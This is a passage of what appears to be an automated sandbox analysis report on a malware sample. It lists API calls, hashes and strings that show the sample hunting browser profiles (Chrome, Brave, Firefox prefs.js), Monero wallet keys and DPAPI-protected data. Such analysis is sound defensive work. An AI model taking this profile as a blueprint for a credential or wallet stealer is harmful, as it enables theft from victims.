                              • Opcode Fuzzy Hash: 8bef2c8f2dc02e55fde9069c274e7237d7c7fe2d72f3072d61a3f350da59e490
                              • Instruction Fuzzy Hash: 6AE0ECA5A5420153DA00B3F8AC4AB2A369CFB2434EF050926FE09D2102FE25E80585AB
                              APIs
                              • wsprintfA.USER32 ref: 008638CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 008638E3
                              • lstrcat.KERNEL32(?,?), ref: 00863935
                              • StrCmpCA.SHLWAPI(?,00870F70), ref: 00863947
                              • StrCmpCA.SHLWAPI(?,00870F74), ref: 0086395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00863C67
                              • FindClose.KERNEL32(000000FF), ref: 00863C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 897393f332a8e1481254c598692e2a4da3168f478389227ec60c3f3ad165331e
                              • Instruction ID: 1962c05ab1807d0b664fd982d1d78299903a9949bb4454257619de4b2cd59081
                              • Opcode Fuzzy Hash: 897393f332a8e1481254c598692e2a4da3168f478389227ec60c3f3ad165331e
                              • Instruction Fuzzy Hash: E6A130B1A002189BDB24DFA4DC85FEA7378FB58301F048589F61DD6181EB759B85CFA2
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00870B32,00870B2B,00000000,?,?,?,008713F4,00870B2A), ref: 0085BEF5
                              • StrCmpCA.SHLWAPI(?,008713F8), ref: 0085BF4D
                              • StrCmpCA.SHLWAPI(?,008713FC), ref: 0085BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0085C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: d67bd0b7ecc53ff48fe45bc6748aa1ee076d4a6c70c339304b82e27e3646db2a
                              • Instruction ID: 3cadbe88a6e75df9fb62ff42b5485f11108bffb0ff16416c0dc9b81e6f1cdf66
                              • Opcode Fuzzy Hash: d67bd0b7ecc53ff48fe45bc6748aa1ee076d4a6c70c339304b82e27e3646db2a
                              • Instruction Fuzzy Hash: 154222729101049BCB18FBA8DD96EED7379FB94300F418569B90AE7181EE349B49CF93
                              APIs
                              • wsprintfA.USER32 ref: 0086492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00864943
                              • StrCmpCA.SHLWAPI(?,00870FDC), ref: 00864971
                              • StrCmpCA.SHLWAPI(?,00870FE0), ref: 00864987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00864B7D
                              • FindClose.KERNEL32(000000FF), ref: 00864B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 8d50cab933bfe3bc6a10cb337e8b21bd8afbe5cdae1b942368103c564d53f35a
                              • Instruction ID: 728149b9bda4b59a9a8f903cebfed3103b015dd52896862604cef5258f4fd2c7
                              • Opcode Fuzzy Hash: 8d50cab933bfe3bc6a10cb337e8b21bd8afbe5cdae1b942368103c564d53f35a
                              • Instruction Fuzzy Hash: 506142B1500218ABCB24EBE4DC49EEA7378FB58701F048589E509D6145EE74EB45CF92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00864580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00864587
                              • wsprintfA.USER32 ref: 008645A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 008645BD
                              • StrCmpCA.SHLWAPI(?,00870FC4), ref: 008645EB
                              • StrCmpCA.SHLWAPI(?,00870FC8), ref: 00864601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0086468B
                              • FindClose.KERNEL32(000000FF), ref: 008646A0
                              • lstrcat.KERNEL32(?,015CE500), ref: 008646C5
                              • lstrcat.KERNEL32(?,015CD6D8), ref: 008646D8
                              • lstrlen.KERNEL32(?), ref: 008646E5
                              • lstrlen.KERNEL32(?), ref: 008646F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: b428ef53a88117caddcffda37ad1ed843fa1fcb5b299d19a6aad3918d2ecb0aa
                              • Instruction ID: 97832abe4d6af1803b5e7be9bca8a3ac69612a05a19db6d64bbd6f13ebff37be
                              • Opcode Fuzzy Hash: b428ef53a88117caddcffda37ad1ed843fa1fcb5b299d19a6aad3918d2ecb0aa
                              • Instruction Fuzzy Hash: D05133B16002189BCB24EBB4DC89FED737CFB64701F40858AB609D6190EF749A858F92
                              APIs
                              • wsprintfA.USER32 ref: 00863EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00863EDA
                              • StrCmpCA.SHLWAPI(?,00870FAC), ref: 00863F08
                              • StrCmpCA.SHLWAPI(?,00870FB0), ref: 00863F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0086406C
                              • FindClose.KERNEL32(000000FF), ref: 00864081
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: db9ff35ceeafb74d750ade863b76c14de21816355c757247f2630d32e6ea74c5
                              • Instruction ID: 124c89a0e615a8aa279d70c9124febb5baaccdfc679196df1234c2903d35b1cf
                              • Opcode Fuzzy Hash: db9ff35ceeafb74d750ade863b76c14de21816355c757247f2630d32e6ea74c5
                              • Instruction Fuzzy Hash: 2C5158B1910218ABCB24EBF4DC85EEA737CFB54300F048589B659D6140EF75DB868F92
                              APIs
                              • wsprintfA.USER32 ref: 0085ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0085ED55
                              • StrCmpCA.SHLWAPI(?,00871538), ref: 0085EDAB
                              • StrCmpCA.SHLWAPI(?,0087153C), ref: 0085EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0085F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 59b410475010d3bfefabc781c287f71df8b6bf2c6c5c513f72dd6dad100a2fc5
                              • Instruction ID: 20292fc47f7041222a5ecbd2d197bd8d5619c138b2908a2390f9f97503526c3a
                              • Opcode Fuzzy Hash: 59b410475010d3bfefabc781c287f71df8b6bf2c6c5c513f72dd6dad100a2fc5
                              • Instruction Fuzzy Hash: 1DE1B1719111189ADB58FB64DC96EEE7338FF54300F4145A9B51AF2092EE306B8ACF93
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008715B8,00870D96), ref: 0085F71E
                              • StrCmpCA.SHLWAPI(?,008715BC), ref: 0085F76F
                              • StrCmpCA.SHLWAPI(?,008715C0), ref: 0085F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0085FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1db372583c48fc6d5f0f98b64d785de4627a4732f3ad294b277b4d82fa4c7037
                              • Instruction ID: dc8cef62c5049e1848a7a37646317194e64455562235bafb1f3f118f0145cc89
                              • Opcode Fuzzy Hash: 1db372583c48fc6d5f0f98b64d785de4627a4732f3ad294b277b4d82fa4c7037
                              • Instruction Fuzzy Hash: ADB133719001189BCB28EF68DC96AEE7379FF54300F4181A9A90AE7152EF305B49CF93
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: (c>_$*u_$7-I@$F~$H15=$kx|~$sX>?$t_{$~g?$"Q$Mg
                              • API String ID: 0-848234313
                              • Opcode ID: 6455bc3a3ce941fdf0057011830cf58fea937d47cf675436e8032454f6686557
                              • Instruction ID: 43c068bc7fc64b79a005b083664d1cf0d3d298cb33b3e600cbb5e6234477f9c3
                              • Opcode Fuzzy Hash: 6455bc3a3ce941fdf0057011830cf58fea937d47cf675436e8032454f6686557
                              • Instruction Fuzzy Hash: FBB228F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A853DEAC5C7744E93558058693
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0087510C,?,?,?,008751B4,?,?,00000000,?,00000000), ref: 00851923
                              • StrCmpCA.SHLWAPI(?,0087525C), ref: 00851973
                              • StrCmpCA.SHLWAPI(?,00875304), ref: 00851989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00851D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00851DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00851E20
                              • FindClose.KERNEL32(000000FF), ref: 00851E32
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 0a1397f9d866cb0092f75e2f6ee5163741bd37e8f44b271dad37795ef8feccff
                              • Instruction ID: 7f32e39060e4c6c4c4d67d1d29d75c8897927a6932937b1493024808078437e2
                              • Opcode Fuzzy Hash: 0a1397f9d866cb0092f75e2f6ee5163741bd37e8f44b271dad37795ef8feccff
                              • Instruction Fuzzy Hash: 1212E8719101189ADB19EB64CC96AEEB378FF54300F5141A9A51AF3191EF306F89CFA2
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00870C2E), ref: 0085DE5E
                              • StrCmpCA.SHLWAPI(?,008714C8), ref: 0085DEAE
                              • StrCmpCA.SHLWAPI(?,008714CC), ref: 0085DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0085E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 69ddf3af4dcb577898156d0deb52ea6e73753c79edf913666ec7afb0d9b65f52
                              • Instruction ID: 57e2c9b42f14c4e166e06caf422083c30a9e2ee1815acb2dfd78f7b84442e965
                              • Opcode Fuzzy Hash: 69ddf3af4dcb577898156d0deb52ea6e73753c79edf913666ec7afb0d9b65f52
                              • Instruction Fuzzy Hash: 15F19E719141189ADB19FB64CC96EEE7338FF54300F9141EAA51AB2091EF346B8ACF53
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008714B0,00870C2A), ref: 0085DAEB
                              • StrCmpCA.SHLWAPI(?,008714B4), ref: 0085DB33
                              • StrCmpCA.SHLWAPI(?,008714B8), ref: 0085DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0085DDDE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 91afabec8ff41a6905ba256132eb5f4e11e16d0e25c4bdc26ea90ede743c4e49
                              • Instruction ID: 609ec5b42582501ae6dc2e7e894d1d56d73d0f7be82ffbf10213d65a25cc7d9b
                              • Opcode Fuzzy Hash: 91afabec8ff41a6905ba256132eb5f4e11e16d0e25c4bdc26ea90ede743c4e49
                              • Instruction Fuzzy Hash: 96911F72A002049BCB18FBB4DC969ED737DFB94301F418569AD5AE6141EE349B098F93
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3MG$6|fM$CK|}$EE}$I7_}$jy$rY$vY
                              • API String ID: 0-1416352975
                              • Opcode ID: a758d94da89028957a9660dab8fd913aee4acca6ee049b83e34a528634fcdd95
                              • Instruction ID: 37d0b5c6713ef51b7335e90e9db993bee65bbce4a56859a523a7c436d4a0229f
                              • Opcode Fuzzy Hash: a758d94da89028957a9660dab8fd913aee4acca6ee049b83e34a528634fcdd95
                              • Instruction Fuzzy Hash: D6B2F5F3608204AFE3046E2DEC8577AFBE9EF94620F1A493DEAC5C7740E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %/t$7lW'$8_$A;7{$JE?$Xc?$c={$I{
                              • API String ID: 0-741620519
                              • Opcode ID: f9f51ba3616659720488a8075f0dec9351ccd970e666dab94d8a3c8a34142ece
                              • Instruction ID: 4729692b4613420f9088bc915eb09c0764388bb833ce34fc5c939ee3b68198ac
                              • Opcode Fuzzy Hash: f9f51ba3616659720488a8075f0dec9351ccd970e666dab94d8a3c8a34142ece
                              • Instruction Fuzzy Hash: 83B2F3F360C204AFE314AE29EC85A7AFBE9EF94720F16493DE6C4C7740E67558018697
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,008705AF), ref: 00867BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00867BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00867C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00867C62
                              • LocalFree.KERNEL32(00000000), ref: 00867D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: ae580c94aeee6de5d43c9a9bcdadadeb11f1c96d77358107f12946614ba2e18e
                              • Instruction ID: 99939690e7fa5b7b7f972a2e9215a359454f673ae16267ed9ba032f73f67ab97
                              • Opcode Fuzzy Hash: ae580c94aeee6de5d43c9a9bcdadadeb11f1c96d77358107f12946614ba2e18e
                              • Instruction Fuzzy Hash: 3A414D71940218ABCB24DF98DC99BEEB774FF54704F204199E509B2290DB342F86CFA2
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00870D73), ref: 0085E4A2
                              • StrCmpCA.SHLWAPI(?,008714F8), ref: 0085E4F2
                              • StrCmpCA.SHLWAPI(?,008714FC), ref: 0085E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0085EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: cbb3f1d4943d71264007b0790770df00d5cfd6e3b95c34b4fb61e31a0858f134
                              • Instruction ID: da0d662e043c35c73330155d094380d7e0689a372e37a19c383f88d5a96664aa
                              • Opcode Fuzzy Hash: cbb3f1d4943d71264007b0790770df00d5cfd6e3b95c34b4fb61e31a0858f134
                              • Instruction Fuzzy Hash: FA122B719101189ADB1CFBA8DC96AEE7339FB54300F4141A9A51AE3191EE346F49CF93
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #GCL$LulE$ho*X$sMwq$?=$u
                              • API String ID: 0-2028790609
                              • Opcode ID: 82d1c2ece3d40f7dfe8a200b527745b8db854095d0fe2d29f92339c886aa1cdb
                              • Instruction ID: d8bd0ffa334f3ac250c0d35a1fb5ed9a03f902a2b1487134efa0e0e3020b485b
                              • Opcode Fuzzy Hash: 82d1c2ece3d40f7dfe8a200b527745b8db854095d0fe2d29f92339c886aa1cdb
                              • Instruction Fuzzy Hash: 87B206F360C2049FE304AE29EC8567AFBE9EBD4720F16893DE6C4C7744EA3558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: S>w$UbW}$*w$*w$Z
                              • API String ID: 0-1771617775
                              • Opcode ID: fffce68c77e325023e7340825804abcff1fb7ca9849a6442a782e6ea002376e3
                              • Instruction ID: 0bc51e55034d0acddb491a56e1d8eb9a8d1be78399da6d3e0ba746a0e6ac4d6a
                              • Opcode Fuzzy Hash: fffce68c77e325023e7340825804abcff1fb7ca9849a6442a782e6ea002376e3
                              • Instruction Fuzzy Hash: 2BB228B360C2049FE3046E2DEC8567BFBE9EF94720F1A493DE6C5C3744EA7558018696
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0085C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0085C87C
                              • lstrcat.KERNEL32(?,00870B46), ref: 0085C943
                              • lstrcat.KERNEL32(?,00870B47), ref: 0085C957
                              • lstrcat.KERNEL32(?,00870B4E), ref: 0085C978
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 07b8df44741791f349f2ce8a10ec67b6fa83664e36cc757360e6bd1da390e17b
                              • Instruction ID: 854c20d8440e6f752e958fd71aa7f6eb6a5be296b407e72b1521cf3c90c66c09
                              • Opcode Fuzzy Hash: 07b8df44741791f349f2ce8a10ec67b6fa83664e36cc757360e6bd1da390e17b
                              • Instruction Fuzzy Hash: E1417175A0420ADFDB10DF94DC89BEEB7B8FB48304F1041A9F509A6280DB745B85CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0085724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00857254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00857281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008572A4
                              • LocalFree.KERNEL32(?), ref: 008572AE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 7b0c322ba427110057b3ac4d258b307cce56ff3a542367545693264cd4943ad5
                              • Instruction ID: cc31fe2a8d6a88601a0b90247f111f90d26391cf3ac574f79565ab1da75b8e1d
                              • Opcode Fuzzy Hash: 7b0c322ba427110057b3ac4d258b307cce56ff3a542367545693264cd4943ad5
                              • Instruction Fuzzy Hash: F201ED75B40208BBDB10DBD4DD4AF9E7778FB44705F108156FB05EA2C0DA70AA058BA5
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0086961E
                              • Process32First.KERNEL32(00870ACA,00000128), ref: 00869632
                              • Process32Next.KERNEL32(00870ACA,00000128), ref: 00869647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0086965C
                              • CloseHandle.KERNEL32(00870ACA), ref: 0086967A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
